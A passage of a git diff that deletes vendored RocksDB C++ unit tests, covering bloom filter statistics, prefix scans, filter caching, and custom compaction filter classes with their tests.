-  ASSERT_EQ(0, get_perf_context()->bloom_sst_miss_count);
-
-  Flush();
-
-  // sanity checks
-  ASSERT_EQ(0, get_perf_context()->bloom_sst_hit_count);
-  ASSERT_EQ(0, get_perf_context()->bloom_sst_miss_count);
-
-  // check SST bloom stats
-  ASSERT_EQ(value1, Get(key1));
-  ASSERT_EQ(1, get_perf_context()->bloom_sst_hit_count);
-  ASSERT_EQ(value3, Get(key3));
-  ASSERT_EQ(2, get_perf_context()->bloom_sst_hit_count);
-
-  ASSERT_EQ("NOT_FOUND", Get(key2));
-  ASSERT_EQ(1, get_perf_context()->bloom_sst_miss_count);
-}
-
-// Same scenario as in BloomStatsTest but using an iterator
-TEST_P(BloomStatsTestWithParam, BloomStatsTestWithIter) {
-  std::string key1("AAAA");
-  std::string key2("RXDB");  // not in DB
-  std::string key3("ZBRA");
-  std::string value1("Value1");
-  std::string value3("Value3");
-
-  ASSERT_OK(Put(key1, value1, WriteOptions()));
-  ASSERT_OK(Put(key3, value3, WriteOptions()));
-
-  unique_ptr<Iterator> iter(dbfull()->NewIterator(ReadOptions()));
-
-  // check memtable bloom stats
-  iter->Seek(key1);
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(value1, iter->value().ToString());
-  ASSERT_EQ(1, get_perf_context()->bloom_memtable_hit_count);
-  ASSERT_EQ(0, get_perf_context()->bloom_memtable_miss_count);
-
-  iter->Seek(key3);
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(value3, iter->value().ToString());
-  ASSERT_EQ(2, get_perf_context()->bloom_memtable_hit_count);
-  ASSERT_EQ(0, get_perf_context()->bloom_memtable_miss_count);
-
-  iter->Seek(key2);
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-  ASSERT_EQ(1, get_perf_context()->bloom_memtable_miss_count);
-  ASSERT_EQ(2, get_perf_context()->bloom_memtable_hit_count);
-
-  Flush();
-
-  iter.reset(dbfull()->NewIterator(ReadOptions()));
-
-  // Check SST bloom stats
-  iter->Seek(key1);
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(value1, iter->value().ToString());
-  ASSERT_EQ(1, get_perf_context()->bloom_sst_hit_count);
-
-  iter->Seek(key3);
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(value3, iter->value().ToString());
-  ASSERT_EQ(2, get_perf_context()->bloom_sst_hit_count);
-
-  iter->Seek(key2);
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-  ASSERT_EQ(1, get_perf_context()->bloom_sst_miss_count);
-  ASSERT_EQ(2, get_perf_context()->bloom_sst_hit_count);
-}
-
-INSTANTIATE_TEST_CASE_P(BloomStatsTestWithParam, BloomStatsTestWithParam,
-                        ::testing::Values(std::make_tuple(true, true, false),
-                                          std::make_tuple(true, false, false),
-                                          std::make_tuple(true, false, true),
-                                          std::make_tuple(false, false,
-                                                          false)));
-
-namespace {
-void PrefixScanInit(DBBloomFilterTest* dbtest) {
-  char buf[100];
-  std::string keystr;
-  const int small_range_sstfiles = 5;
-  const int big_range_sstfiles = 5;
-
-  // Generate 11 sst files with the following prefix ranges.
-  // GROUP 0: [0,10]                              (level 1)
-  // GROUP 1: [1,2], [2,3], [3,4], [4,5], [5, 6]  (level 0)
-  // GROUP 2: [0,6], [0,7], [0,8], [0,9], [0,10]  (level 0)
-  //
-  // A seek with the previous API would do 11 random I/Os (to all the
-  // files).  With the new API and a prefix filter enabled, we should
-  // only do 2 random I/O, to the 2 files containing the key.
-
-  // GROUP 0
-  snprintf(buf, sizeof(buf), "%02d______:start", 0);
-  keystr = std::string(buf);
-  ASSERT_OK(dbtest->Put(keystr, keystr));
-  snprintf(buf, sizeof(buf), "%02d______:end", 10);
-  keystr = std::string(buf);
-  ASSERT_OK(dbtest->Put(keystr, keystr));
-  dbtest->Flush();
-  dbtest->dbfull()->CompactRange(CompactRangeOptions(), nullptr,
-                                 nullptr);  // move to level 1
-
-  // GROUP 1
-  for (int i = 1; i <= small_range_sstfiles; i++) {
-    snprintf(buf, sizeof(buf), "%02d______:start", i);
-    keystr = std::string(buf);
-    ASSERT_OK(dbtest->Put(keystr, keystr));
-    snprintf(buf, sizeof(buf), "%02d______:end", i + 1);
-    keystr = std::string(buf);
-    ASSERT_OK(dbtest->Put(keystr, keystr));
-    dbtest->Flush();
-  }
-
-  // GROUP 2
-  for (int i = 1; i <= big_range_sstfiles; i++) {
-    snprintf(buf, sizeof(buf), "%02d______:start", 0);
-    keystr = std::string(buf);
-    ASSERT_OK(dbtest->Put(keystr, keystr));
-    snprintf(buf, sizeof(buf), "%02d______:end", small_range_sstfiles + i + 1);
-    keystr = std::string(buf);
-    ASSERT_OK(dbtest->Put(keystr, keystr));
-    dbtest->Flush();
-  }
-}
-}  // namespace
-
-TEST_F(DBBloomFilterTest, PrefixScan) {
-  while (ChangeFilterOptions()) {
-    int count;
-    Slice prefix;
-    Slice key;
-    char buf[100];
-    Iterator* iter;
-    snprintf(buf, sizeof(buf), "03______:");
-    prefix = Slice(buf, 8);
-    key = Slice(buf, 9);
-    ASSERT_EQ(key.difference_offset(prefix), 8);
-    ASSERT_EQ(prefix.difference_offset(key), 8);
-    // db configs
-    env_->count_random_reads_ = true;
-    Options options = CurrentOptions();
-    options.env = env_;
-    options.prefix_extractor.reset(NewFixedPrefixTransform(8));
-    options.disable_auto_compactions = true;
-    options.max_background_compactions = 2;
-    options.create_if_missing = true;
-    options.memtable_factory.reset(NewHashSkipListRepFactory(16));
-    options.allow_concurrent_memtable_write = false;
-
-    BlockBasedTableOptions table_options;
-    table_options.no_block_cache = true;
-    table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-    table_options.whole_key_filtering = false;
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-    // 11 RAND I/Os
-    DestroyAndReopen(options);
-    PrefixScanInit(this);
-    count = 0;
-    env_->random_read_counter_.Reset();
-    iter = db_->NewIterator(ReadOptions());
-    for (iter->Seek(prefix); iter->Valid(); iter->Next()) {
-      if (!iter->key().starts_with(prefix)) {
-        break;
-      }
-      count++;
-    }
-    ASSERT_OK(iter->status());
-    delete iter;
-    ASSERT_EQ(count, 2);
-    ASSERT_EQ(env_->random_read_counter_.Read(), 2);
-    Close();
-  }  // end of while
-}
-
-TEST_F(DBBloomFilterTest, OptimizeFiltersForHits) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 64 * 1024;
-  options.arena_block_size = 4 * 1024;
-  options.target_file_size_base = 64 * 1024;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_stop_writes_trigger = 4;
-  options.max_bytes_for_level_base = 256 * 1024;
-  options.max_write_buffer_number = 2;
-  options.max_background_compactions = 8;
-  options.max_background_flushes = 8;
-  options.compression = kNoCompression;
-  options.compaction_style = kCompactionStyleLevel;
-  options.level_compaction_dynamic_level_bytes = true;
-  BlockBasedTableOptions bbto;
-  bbto.cache_index_and_filter_blocks = true;
-  bbto.filter_policy.reset(NewBloomFilterPolicy(10, true));
-  bbto.whole_key_filtering = true;
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  options.optimize_filters_for_hits = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  CreateAndReopenWithCF({"mypikachu"}, options);
-
-  int numkeys = 200000;
-
-  // Generate randomly shuffled keys, so the updates are almost
-  // random.
-  std::vector<int> keys;
-  keys.reserve(numkeys);
-  for (int i = 0; i < numkeys; i += 2) {
-    keys.push_back(i);
-  }
-  std::random_shuffle(std::begin(keys), std::end(keys));
-
-  int num_inserted = 0;
-  for (int key : keys) {
-    ASSERT_OK(Put(1, Key(key), "val"));
-    if (++num_inserted % 1000 == 0) {
-      dbfull()->TEST_WaitForFlushMemTable();
-      dbfull()->TEST_WaitForCompact();
-    }
-  }
-  ASSERT_OK(Put(1, Key(0), "val"));
-  ASSERT_OK(Put(1, Key(numkeys), "val"));
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  if (NumTableFilesAtLevel(0, 1) == 0) {
-    // No Level 0 file. Create one.
-    ASSERT_OK(Put(1, Key(0), "val"));
-    ASSERT_OK(Put(1, Key(numkeys), "val"));
-    ASSERT_OK(Flush(1));
-    dbfull()->TEST_WaitForCompact();
-  }
-
-  for (int i = 1; i < numkeys; i += 2) {
-    ASSERT_EQ(Get(1, Key(i)), "NOT_FOUND");
-  }
-
-  ASSERT_EQ(0, TestGetTickerCount(options, GET_HIT_L0));
-  ASSERT_EQ(0, TestGetTickerCount(options, GET_HIT_L1));
-  ASSERT_EQ(0, TestGetTickerCount(options, GET_HIT_L2_AND_UP));
-
-  // Now we have three sorted run, L0, L5 and L6 with most files in L6 have
-  // no bloom filter. Most keys be checked bloom filters twice.
-  ASSERT_GT(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 65000 * 2);
-  ASSERT_LT(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 120000 * 2);
-
-  for (int i = 0; i < numkeys; i += 2) {
-    ASSERT_EQ(Get(1, Key(i)), "val");
-  }
-
-  // Part 2 (read path): rewrite last level with blooms, then verify they get
-  // cached only if !optimize_filters_for_hits
-  options.disable_auto_compactions = true;
-  options.num_levels = 9;
-  options.optimize_filters_for_hits = false;
-  options.statistics = CreateDBStatistics();
-  bbto.block_cache.reset();
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-
-  ReopenWithColumnFamilies({"default", "mypikachu"}, options);
-  MoveFilesToLevel(7 /* level */, 1 /* column family index */);
-
-  std::string value = Get(1, Key(0));
-  uint64_t prev_cache_filter_hits =
-      TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT);
-  value = Get(1, Key(0));
-  ASSERT_EQ(prev_cache_filter_hits + 1,
-            TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-
-  // Now that we know the filter blocks exist in the last level files, see if
-  // filter caching is skipped for this optimization
-  options.optimize_filters_for_hits = true;
-  options.statistics = CreateDBStatistics();
-  bbto.block_cache.reset();
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-
-  ReopenWithColumnFamilies({"default", "mypikachu"}, options);
-
-  value = Get(1, Key(0));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(2 /* index and data block */,
-            TestGetTickerCount(options, BLOCK_CACHE_ADD));
-
-  // Check filter block ignored for files preloaded during DB::Open()
-  options.max_open_files = -1;
-  options.statistics = CreateDBStatistics();
-  bbto.block_cache.reset();
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-
-  ReopenWithColumnFamilies({"default", "mypikachu"}, options);
-
-  uint64_t prev_cache_filter_misses =
-      TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS);
-  prev_cache_filter_hits = TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT);
-  Get(1, Key(0));
-  ASSERT_EQ(prev_cache_filter_misses,
-            TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(prev_cache_filter_hits,
-            TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-
-  // Check filter block ignored for file trivially-moved to bottom level
-  bbto.block_cache.reset();
-  options.max_open_files = 100;  // setting > -1 makes it not preload all files
-  options.statistics = CreateDBStatistics();
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-
-  ReopenWithColumnFamilies({"default", "mypikachu"}, options);
-
-  ASSERT_OK(Put(1, Key(numkeys + 1), "val"));
-  ASSERT_OK(Flush(1));
-
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  CompactRangeOptions compact_options;
-  compact_options.bottommost_level_compaction =
-      BottommostLevelCompaction::kSkip;
-  compact_options.change_level = true;
-  compact_options.target_level = 7;
-  db_->CompactRange(compact_options, handles_[1], nullptr, nullptr);
-
-  ASSERT_EQ(trivial_move, 1);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  prev_cache_filter_hits = TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT);
-  prev_cache_filter_misses =
-      TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS);
-  value = Get(1, Key(numkeys + 1));
-  ASSERT_EQ(prev_cache_filter_hits,
-            TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(prev_cache_filter_misses,
-            TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-
-  // Check filter block not cached for iterator
-  bbto.block_cache.reset();
-  options.statistics = CreateDBStatistics();
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-
-  ReopenWithColumnFamilies({"default", "mypikachu"}, options);
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions(), handles_[1]));
-  iter->SeekToFirst();
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(2 /* index and data block */,
-            TestGetTickerCount(options, BLOCK_CACHE_ADD));
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_compaction_filter_test.cc b/thirdparty/rocksdb/db/db_compaction_filter_test.cc
deleted file mode 100644
index 9f751f0..0000000
--- a/thirdparty/rocksdb/db/db_compaction_filter_test.cc
+++ /dev/null
@@ -1,845 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-
-static int cfilter_count = 0;
-static int cfilter_skips = 0;
-
-// This is a static filter used for filtering
-// kvs during the compaction process.
-static std::string NEW_VALUE = "NewValue";
-
-class DBTestCompactionFilter : public DBTestBase {
- public:
-  DBTestCompactionFilter() : DBTestBase("/db_compaction_filter_test") {}
-};
-
-class KeepFilter : public CompactionFilter {
- public:
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value, bool* value_changed) const
-      override {
-    cfilter_count++;
-    return false;
-  }
-
-  virtual const char* Name() const override { return "KeepFilter"; }
-};
-
-class DeleteFilter : public CompactionFilter {
- public:
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value, bool* value_changed) const
-      override {
-    cfilter_count++;
-    return true;
-  }
-
-  virtual const char* Name() const override { return "DeleteFilter"; }
-};
-
-class DeleteISFilter : public CompactionFilter {
- public:
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    cfilter_count++;
-    int i = std::stoi(key.ToString());
-    if (i > 5 && i <= 105) {
-      return true;
-    }
-    return false;
-  }
-
-  virtual bool IgnoreSnapshots() const override { return true; }
-
-  virtual const char* Name() const override { return "DeleteFilter"; }
-};
-
-// Skip x if floor(x/10) is even, use range skips. Requires that keys are
-// zero-padded to length 10.
-class SkipEvenFilter : public CompactionFilter {
- public:
-  virtual Decision FilterV2(int level, const Slice& key, ValueType value_type,
-                            const Slice& existing_value, std::string* new_value,
-                            std::string* skip_until) const override {
-    cfilter_count++;
-    int i = std::stoi(key.ToString());
-    if (i / 10 % 2 == 0) {
-      char key_str[100];
-      snprintf(key_str, sizeof(key), "%010d", i / 10 * 10 + 10);
-      *skip_until = key_str;
-      ++cfilter_skips;
-      return Decision::kRemoveAndSkipUntil;
-    }
-    return Decision::kKeep;
-  }
-
-  virtual bool IgnoreSnapshots() const override { return true; }
-
-  virtual const char* Name() const override { return "DeleteFilter"; }
-};
-
-class DelayFilter : public CompactionFilter {
- public:
-  explicit DelayFilter(DBTestBase* d) : db_test(d) {}
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    db_test->env_->addon_time_.fetch_add(1000);
-    return true;
-  }
-
-  virtual const char* Name() const override { return "DelayFilter"; }
-
- private:
-  DBTestBase* db_test;
-};
-
-class ConditionalFilter : public CompactionFilter {
- public:
-  explicit ConditionalFilter(const std::string* filtered_value)
-      : filtered_value_(filtered_value) {}
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    return value.ToString() == *filtered_value_;
-  }
-
-  virtual const char* Name() const override { return "ConditionalFilter"; }
-
- private:
-  const std::string* filtered_value_;
-};
-
-class ChangeFilter : public CompactionFilter {
- public:
-  explicit ChangeFilter() {}
-
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value, bool* value_changed) const
-      override {
-    assert(new_value != nullptr);
-    *new_value = NEW_VALUE;
-    *value_changed = true;
-    return false;
-  }
-
-  virtual const char* Name() const override { return "ChangeFilter"; }
-};
-
-class KeepFilterFactory : public CompactionFilterFactory {
- public:
-  explicit KeepFilterFactory(bool check_context = false,
-                             bool check_context_cf_id = false)
-      : check_context_(check_context),
-        check_context_cf_id_(check_context_cf_id),
-        compaction_filter_created_(false) {}
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    if (check_context_) {
-      EXPECT_EQ(expect_full_compaction_.load(), context.is_full_compaction);
-      EXPECT_EQ(expect_manual_compaction_.load(), context.is_manual_compaction);
-    }
-    if (check_context_cf_id_) {
-      EXPECT_EQ(expect_cf_id_.load(), context.column_family_id);
-    }
-    compaction_filter_created_ = true;
-    return std::unique_ptr<CompactionFilter>(new KeepFilter());
-  }
-
-  bool compaction_filter_created() const { return compaction_filter_created_; }
-
-  virtual const char* Name() const override { return "KeepFilterFactory"; }
-  bool check_context_;
-  bool check_context_cf_id_;
-  std::atomic_bool expect_full_compaction_;
-  std::atomic_bool expect_manual_compaction_;
-  std::atomic<uint32_t> expect_cf_id_;
-  bool compaction_filter_created_;
-};
-
-class DeleteFilterFactory : public CompactionFilterFactory {
- public:
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    if (context.is_manual_compaction) {
-      return std::unique_ptr<CompactionFilter>(new DeleteFilter());
-    } else {
-      return std::unique_ptr<CompactionFilter>(nullptr);
-    }
-  }
-
-  virtual const char* Name() const override { return "DeleteFilterFactory"; }
-};
-
-// Delete Filter Factory which ignores snapshots
-class DeleteISFilterFactory : public CompactionFilterFactory {
- public:
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    if (context.is_manual_compaction) {
-      return std::unique_ptr<CompactionFilter>(new DeleteISFilter());
-    } else {
-      return std::unique_ptr<CompactionFilter>(nullptr);
-    }
-  }
-
-  virtual const char* Name() const override { return "DeleteFilterFactory"; }
-};
-
-class SkipEvenFilterFactory : public CompactionFilterFactory {
- public:
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    if (context.is_manual_compaction) {
-      return std::unique_ptr<CompactionFilter>(new SkipEvenFilter());
-    } else {
-      return std::unique_ptr<CompactionFilter>(nullptr);
-    }
-  }
-
-  virtual const char* Name() const override { return "SkipEvenFilterFactory"; }
-};
-
-class DelayFilterFactory : public CompactionFilterFactory {
- public:
-  explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {}
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    return std::unique_ptr<CompactionFilter>(new DelayFilter(db_test));
-  }
-
-  virtual const char* Name() const override { return "DelayFilterFactory"; }
-
- private:
-  DBTestBase* db_test;
-};
-
-class ConditionalFilterFactory : public CompactionFilterFactory {
- public:
-  explicit ConditionalFilterFactory(const Slice& filtered_value)
-      : filtered_value_(filtered_value.ToString()) {}
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    return std::unique_ptr<CompactionFilter>(
-        new ConditionalFilter(&filtered_value_));
-  }
-
-  virtual const char* Name() const override {
-    return "ConditionalFilterFactory";
-  }
-
- private:
-  std::string filtered_value_;
-};
-
-class ChangeFilterFactory : public CompactionFilterFactory {
- public:
-  explicit ChangeFilterFactory() {}
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    return std::unique_ptr<CompactionFilter>(new ChangeFilter());
-  }
-
-  virtual const char* Name() const override { return "ChangeFilterFactory"; }
-};
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTestCompactionFilter, CompactionFilter) {
-  Options options = CurrentOptions();
-  options.max_open_files = -1;
-  options.num_levels = 3;
-  options.compaction_filter_factory = std::make_shared<KeepFilterFactory>();
-  options = CurrentOptions(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Write 100K keys, these are written to a few files in L0.
-  const std::string value(10, 'x');
-  for (int i = 0; i < 100000; i++) {
-    char key[100];
-    snprintf(key, sizeof(key), "B%010d", i);
-    Put(1, key, value);
-  }
-  ASSERT_OK(Flush(1));
-
-  // Push all files to the highest level L2. Verify that
-  // the compaction is each level invokes the filter for
-  // all the keys in that level.
-  cfilter_count = 0;
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-  ASSERT_EQ(cfilter_count, 100000);
-  cfilter_count = 0;
-  dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-  ASSERT_EQ(cfilter_count, 100000);
-
-  ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(1, 1), 0);
-  ASSERT_NE(NumTableFilesAtLevel(2, 1), 0);
-  cfilter_count = 0;
-
-  // All the files are in the lowest level.
-  // Verify that all but the 100001st record
-  // has sequence number zero. The 100001st record
-  // is at the tip of this snapshot and cannot
-  // be zeroed out.
-  int count = 0;
-  int total = 0;
-  Arena arena;
-  {
-    InternalKeyComparator icmp(options.comparator);
-    RangeDelAggregator range_del_agg(icmp, {} /* snapshots */);
-    ScopedArenaIterator iter(
-        dbfull()->NewInternalIterator(&arena, &range_del_agg, handles_[1]));
-    iter->SeekToFirst();
-    ASSERT_OK(iter->status());
-    while (iter->Valid()) {
-      ParsedInternalKey ikey(Slice(), 0, kTypeValue);
-      ikey.sequence = -1;
-      ASSERT_EQ(ParseInternalKey(iter->key(), &ikey), true);
-      total++;
-      if (ikey.sequence != 0) {
-        count++;
-      }
-      iter->Next();
-    }
-  }
-  ASSERT_EQ(total, 100000);
-  ASSERT_EQ(count, 1);
-
-  // overwrite all the 100K keys once again.
-  for (int i = 0; i < 100000; i++) {
-    char key[100];
-    snprintf(key, sizeof(key), "B%010d", i);
-    ASSERT_OK(Put(1, key, value));
-  }
-  ASSERT_OK(Flush(1));
-
-  // push all files to the highest level L2. This
-  // means that all keys should pass at least once
-  // via the compaction filter
-  cfilter_count = 0;
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-  ASSERT_EQ(cfilter_count, 100000);
-  cfilter_count = 0;
-  dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-  ASSERT_EQ(cfilter_count, 100000);
-  ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(1, 1), 0);
-  ASSERT_NE(NumTableFilesAtLevel(2, 1), 0);
-
-  // create a new database with the compaction
-  // filter in such a way that it deletes all keys
-  options.compaction_filter_factory = std::make_shared<DeleteFilterFactory>();
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // write all the keys once again.
-  for (int i = 0; i < 100000; i++) {
-    char key[100];
-    snprintf(key, sizeof(key), "B%010d", i);
-    ASSERT_OK(Put(1, key, value));
-  }
-  ASSERT_OK(Flush(1));
-  ASSERT_NE(NumTableFilesAtLevel(0, 1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(1, 1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(2, 1), 0);
-
-  // Push all files to the highest level L2. This
-  // triggers the compaction filter to delete all keys,
-  // verify that at the end of the compaction process,
-  // nothing is left.
-  cfilter_count = 0;
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-  ASSERT_EQ(cfilter_count, 100000);
-  cfilter_count = 0;
-  dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-  ASSERT_EQ(cfilter_count, 0);
-  ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(1, 1), 0);
-
-  {
-    // Scan the entire database to ensure that nothing is left
-    std::unique_ptr<Iterator> iter(
-        db_->NewIterator(ReadOptions(), handles_[1]));
-    iter->SeekToFirst();
-    count = 0;
-    while (iter->Valid()) {
-      count++;
-      iter->Next();
-    }
-    ASSERT_EQ(count, 0);
-  }
-
-  // The sequence number of the remaining record
-  // is not zeroed out even though it is at the
-  // level Lmax because this record is at the tip
-  count = 0;
-  {
-    InternalKeyComparator icmp(options.comparator);
-    RangeDelAggregator range_del_agg(icmp, {} /* snapshots */);
-    ScopedArenaIterator iter(
-        dbfull()->NewInternalIterator(&arena, &range_del_agg, handles_[1]));
-    iter->SeekToFirst();
-    ASSERT_OK(iter->status());
-    while (iter->Valid()) {
-      ParsedInternalKey ikey(Slice(), 0, kTypeValue);
-      ASSERT_EQ(ParseInternalKey(iter->key(), &ikey), true);
-      ASSERT_NE(ikey.sequence, (unsigned)0);
-      count++;
-      iter->Next();
-    }
-    ASSERT_EQ(count, 0);
-  }
-}
-
-// Tests the edge case where compaction does not produce any output -- all
-// entries are deleted. The compaction should create bunch of 'DeleteFile'
-// entries in VersionEdit, but none of the 'AddFile's.
-TEST_F(DBTestCompactionFilter, CompactionFilterDeletesAll) {
-  Options options = CurrentOptions();
-  options.compaction_filter_factory = std::make_shared<DeleteFilterFactory>();
-  options.disable_auto_compactions = true;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  // put some data
-  for (int table = 0; table < 4; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      Put(ToString(table * 100 + i), "val");
-    }
-    Flush();
-  }
-
-  // this will produce empty file (delete compaction filter)
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ(0U, CountLiveFiles());
-
-  Reopen(options);
-
-  Iterator* itr = db_->NewIterator(ReadOptions());
-  itr->SeekToFirst();
-  // empty db
-  ASSERT_TRUE(!itr->Valid());
-
-  delete itr;
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTestCompactionFilter, CompactionFilterWithValueChange) {
-  do {
-    Options options = CurrentOptions();
-    options.num_levels = 3;
-    options.compaction_filter_factory =
-      std::make_shared<ChangeFilterFactory>();
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Write 100K+1 keys, these are written to a few files
-    // in L0. We do this so that the current snapshot points
-    // to the 100001 key.The compaction filter is  not invoked
-    // on keys that are visible via a snapshot because we
-    // anyways cannot delete it.
-    const std::string value(10, 'x');
-    for (int i = 0; i < 100001; i++) {
-      char key[100];
-      snprintf(key, sizeof(key), "B%010d", i);
-      Put(1, key, value);
-    }
-
-    // push all files to  lower levels
-    ASSERT_OK(Flush(1));
-    if (option_config_ != kUniversalCompactionMultiLevel &&
-        option_config_ != kUniversalSubcompactions) {
-      dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-      dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-    } else {
-      dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                             nullptr);
-    }
-
-    // re-write all data again
-    for (int i = 0; i < 100001; i++) {
-      char key[100];
-      snprintf(key, sizeof(key), "B%010d", i);
-      Put(1, key, value);
-    }
-
-    // push all files to  lower levels. This should
-    // invoke the compaction filter for all 100000 keys.
-    ASSERT_OK(Flush(1));
-    if (option_config_ != kUniversalCompactionMultiLevel &&
-        option_config_ != kUniversalSubcompactions) {
-      dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-      dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-    } else {
-      dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                             nullptr);
-    }
-
-    // verify that all keys now have the new value that
-    // was set by the compaction process.
-    for (int i = 0; i < 100001; i++) {
-      char key[100];
-      snprintf(key, sizeof(key), "B%010d", i);
-      std::string newvalue = Get(1, key);
-      ASSERT_EQ(newvalue.compare(NEW_VALUE), 0);
-    }
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestCompactionFilter, CompactionFilterWithMergeOperator) {
-  std::string one, two, three, four;
-  PutFixed64(&one, 1);
-  PutFixed64(&two, 2);
